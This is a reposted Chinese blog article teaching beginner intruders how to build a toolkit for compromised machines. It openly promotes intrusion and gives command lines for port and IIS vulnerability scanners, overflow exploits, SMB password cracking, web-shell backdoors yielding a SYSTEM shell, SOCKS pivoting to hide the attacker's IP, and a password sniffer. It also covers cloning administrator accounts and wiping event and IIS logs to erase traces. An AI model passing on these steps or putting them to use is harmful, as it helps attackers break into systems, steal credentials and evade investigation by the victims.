现在的位置: 首页 > 综合 > 正文

浅析黑客工具包的构成和使用——-转帖

2012年09月13日 ⁄ 综合 ⁄ 共 3176字 ⁄ 字号 评论关闭
黑客们在攻入一台主机之后,通常会上传一个精心配置的黑客工具包,里面包含了各种常用的黑客工具,在这些工具的帮助下,黑客们将肉鸡改造成为自己的“工作站”,通过它来隐藏自己的踪迹或是作为一个跳板来攻击其它主机。每个优秀的黑客都有自己独特的一套工具,作为刚刚进入黑客殿堂的初学者,如何选择、购造一个适合自己的工具包就显得尤为重要了。一个好的工具包应该包含扫描器、密码破解、嗅探、后门、清除日志……各项功能。下面我将向大家推荐一些适合入门新手的工具,我们要在性能、速度、大小和易用性之间找到一个平衡点,做到既间单又实用。好,LET’S GO!  
  首先打开我们的工具包,拿出第一样利器——扫描器。我为大家准备的是xcgi和PR这两个小东西,扫描通常分为端口扫描和漏洞扫描,端口扫描就是看目标主机开放了哪些端口,在根据相应端口进行入侵尝试。比如一台机器开了21(FTP)端口,我们就可以利用暴力猜解口令的方法尝试进入。而漏洞扫描则通常是针对80端口的,用于检测cgi和IIS漏洞。我们包里的PR是用于端口扫描的,xcgi是用于cgi和IIS漏洞扫描的,它们与同类扫描器相比有以下优点∶速度超快(PR扫3000个端口只要60秒)、体积暴小(PR 7K,xcgi 41K)、还可以自定义漏洞列表,让你随时添加最新漏洞! PR的用法是:c:\pr.exe 127.0.0.1 1-3000 -d:1 -o (扫描127.0.0.1的1至3000端口,-d:1表示扫描延时一秒,-o表示只显示开放的端口); xcgi的用法是c:\xcgi 127.0.0.1 80(ip+端口),在同一个文件夹下,还有cgi.lst这个文件,里面保存的是漏洞列表,你可以用记事本  
打开它,往里面添加最新的漏洞。  
  现在拿出我们第二样利器——暴力破解和溢出程序。我为大家准备了:IISidq,smbcrack,RPCexp,webdavx3这四样东西。在所有的黑客软件中,溢出程序最容易使用,成功率也特别高,常见的可以利用的溢出漏洞有.printer ,.idq,.asp,webdav接口溢出,locator服务溢出....等,其中webdav,locator这两个漏洞是不久之前才公布的,利用价值极大,成功的可能性也非常高,而.printer,.asp这些或者因为过时(.printer只对sp0有效),或者因为成功率低,所以很少用到.在我给出的程序中,IISidq.exe是针对.idq的,RPCexp.exe是针对locator的,webdavx3.exe是针对webdav的。而smbcrack是小榕写的,用于暴力破解nt/2000密码的冬冬,速度极快,最高可达到200多个密码/分钟,绝对是居家旅行必备良器: )  
接下来来是第三样利器——跳板和后门。后门程序是用来保持权限的,方便黑客再次进入,跳板则常用于隐藏真实的ip地址,防止被人反追踪。对于后门,我们要谨慎选择,应为这关系到你是否能长期保持对"爱鸡"的拥有权,现在网上的后门程序层出不穷,但是在杀毒软件的追杀下,再好的后门也只能用1~2个月而已,过了这期限随着杀毒软件的升级,后门便再也无所遁形了.所以优秀的黑客所用的后门往往都是自己写的,但是对于我们而言没有这个水平,那怎么办呢?其实,有两个后门程序,上市已久,但仍然不会被杀,那就是cmd.asp和ispc。cmd.asp是一个用asp编写的网页木马,只要把它放到对方的网页目录下(目录必须要有脚本执行权限),然后在浏览器中输入http://www.victim.com/你放的目录/cmd.asp就可以控制了。ispc有两个文件:ispc.exe,idq.dll  
把idq.dll放在对方的网页目录中,然后在自己的机器上输入c:\ispc www.victim.com/你放的目录/idq.dll,就可以得到一个有system权限的shell了。其实还有不少非常优秀的后门比如wollf,毒箭等,因为会被杀掉等原因,就不再介绍了。至于跳板,snake写的sockserver是当仁不让的首选!支持sock5,sock4代理,可以隐藏你的真实ip,不少人也用它来代理上QQ,要想使用sockserver,你还必须有skServerGUI这个程序,在肉鸡上运行sockserver然后在你自己的机器上运行skServerGUI就可以进行代理了,他还支持多级代理,让追踪你的人迷路去吧。  
现在,我们来看看第四样利器——嗅探器。对于嗅探器,大多数入门不久的朋友应该还比较陌生,其实嗅探器的运行原理很容易理解,使用也比较方便,下面,我将向各位简要地谈谈它地的原理并推荐一个小巧的嗅探器—xsinff。在网络上,有很多服务的传输数据时并没有对所传输的数据进行加密,这些数据中有时也包含了如用户名和密码之类的敏感信息,只要捕获了还有这些信息的数据包,我们就能从中得到用户名和口令,从而进行进一步的入侵。为了捕捉在网络上传输的数据包,嗅探器应运而生,嗅探器有从链路层直接获取数据的能力。通常用于流量分析和异常数据分析,但对于黑客而言,嗅探器却可用于获得口令或者是在进行欺骗攻击之前收集必要的信息。通常黑客们攻入一台主机后,会在这台主机上安装一个嗅探器,这样,在整个子网传输的口令都会被捕获,攻击便会蔓延开来,例如我们有一台肉鸡A,B是我们想入侵的机子,A与B在同一子网内,那么我们在A上运行嗅探器,就可以得到B的用户名和密码,再利用得到的密码,就可以进入B了,这就是sinffer的可怕之处,一个网域内只要有一台主机不安全,那么整个网域也就不安全了。好了,讲了那么多原理,现在来将xsinff的使用吧,xsinff基本上仅用于捕获密码,它提供了后台运行和日志记录的功能,常用格式:c:\xsinff -tcp -pass -hide -log passwd.log  
-tcp 表示抓取tcp包,-pass 捕获口令 ,-hide 是后台运行,-log 是把捕获的口令存放到一个文件中,你可以自己指定文件名,我们这里是纪录到passwd.log这个文件中。   
最后,还有些工具不得不提,这些工具无法具体分类,但绝对是必备的,主要有这几个,pskill,pslist,CA,elsave  
cleanIISlog,wget,pslist(即process_list)顾名思义,是用于查看进程的。pskill是用来杀死进程的,要使用pslist和pskill,必须先建立管道连接(net use \\ip\ipc$Content$nbsp;passwd /user:username)然后c:\pslist/pskill ip就行了。wget是一个命令行下的下载工具,如果你需要别的什么工具,可以用wget从网上直接下载.CA用于克隆管理员账号,通过它,你可以把一个低权限的普通账号克隆成为管理员账号,从而建立一个账户后门。elsave则用来清除自己的入侵痕迹,只需要输入c:\elsave -C 就可以把3个主要日志(system,security,application)清空,还有一个清除日志的软件我们用得很多的,那就是cleanIISlog,我个人非常赞赏这个东东,它可以在iis的日志中删去指定ip留下的纪录,因此,在你扫描完毕进入主机后,千万别忘了运行c:\cleaniislog CleanIP <你的ip>.  
通过上面的介绍,相信大家对黑客工具包的构成和使用有了一定的了解,一个好的工具包最大的用处就是提高入侵的效率。由于每个人的习惯,目的不同,所以笔者介绍的这些并不一定适合您,但是希望在本文本帮助下,各位也能构造一个属于自己的,方便,完善的工具包。

抱歉!评论已关闭.